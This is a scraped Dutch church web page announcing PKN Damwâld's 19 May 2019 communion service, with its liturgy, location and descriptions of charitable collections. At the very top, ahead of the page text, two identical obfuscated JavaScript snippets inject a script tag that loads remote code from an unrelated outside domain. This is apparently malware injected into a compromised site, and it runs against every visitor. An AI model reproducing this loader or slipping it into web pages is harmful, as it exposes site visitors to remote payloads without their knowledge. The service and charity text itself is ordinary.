;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 19 mei 2019 9:30 uur - PKN Damwâld
zondag 19 mei 2019
09:30 uur
Viering Heilig Avondmaal

Kerkdienst zondag 19 mei 2019 9:30 uur

Informatie

Voorganger:Ds. G.J. Otter
Mededeling:Viering Heilig Avondmaal
Liturgie
Lied voor de dienst Gezang 434: 1 en 2
Welkom
We zingen: Elb 241 : 1, 2 en 3
Stil Gebed, Votum en Groet
We zingen: Psalm 42 : 1 en 3
Wetslezing .
We zingen: Gezang 326 : 2 en 5
Gebed
We lezen: Psalm 34
Collecte
We zingen: Gezang 78 : 1 en 2
Preek .
We zingen: Psalm 34 : 4
Formulier lezen
We zingen: Elb 289 : 1 en 3
Viering Heilig Avondmaal
Dankzegging en voorbede
Slotlied Psalm 68 : 7
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: De Ikker Hearewei 1, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Stichting Precious

Stichting Precious richt zich met name op arme inwoners in Noordoost Friesland. Om die mensen te bereiken worden contacten gezocht en onderhouden met plaatselijke/regionale organisaties zoals voedselbanken, kerken en andere organisaties die zich richten op praktische en geestelijke hulpverlening. Tevens wordt gebruik gemaakt van persoonlijke netwerkcontacten en vrijwilligers.
Stichting Precious biedt praktische hulp, bijvoorbeeld door goederen, gratis kleding beurzen, warme maaltijden, in de eerste levensbehoeften van mensen met een minimum inkomen. Daarnaast ondersteunt stichting Precious echtparen op geestelijk gebied.

Tweede collecte: Kerk
Uitganscollecte: Avondmaalscollecte

Uitgang Avondmaalscollecte: Noodhulp in vergeten land – Centraal Afrikaanse Republiek
De Centraal-Afrikaanse Republiek is één van de armste landen ter wereld. Bijna tweederde van de bevolking leeft onder de armoedegrens. Deze voormalige Franse kolonie komt weinig in het nieuws, terwijl daar alle reden toe zou zijn. Sinds een burgeroorlog in 2013 uitbrak verleent Kerk in Actie hier noodhulp via haar internationale kerkelijke netwerk ACT Alliance. Deze vergeten mensen hebben uw steun hard nodig! Meer dan de helft van de bevolking van 4,6 miljoen inwoners is Christen, een kwart hangt inheemse godsdiensten aan en 15% is moslim. Er zijn veel spanningen tussen Christenen en moslims. Beide groepen staan elkaar regelmatig naar het leven. Volgens de Verenigde Naties hebben 2,9 miljoen mensen hulp nodig, waarvan 1,6 miljoen zeer dringend. Meer dan een half miljoen mensen zijn naar buurlanden gevlucht: Tsjaad, Congo, Kameroen, Soedan en Zuid-Soedan. En meer dan 620.000 mensen zijn op de vlucht in eigen land.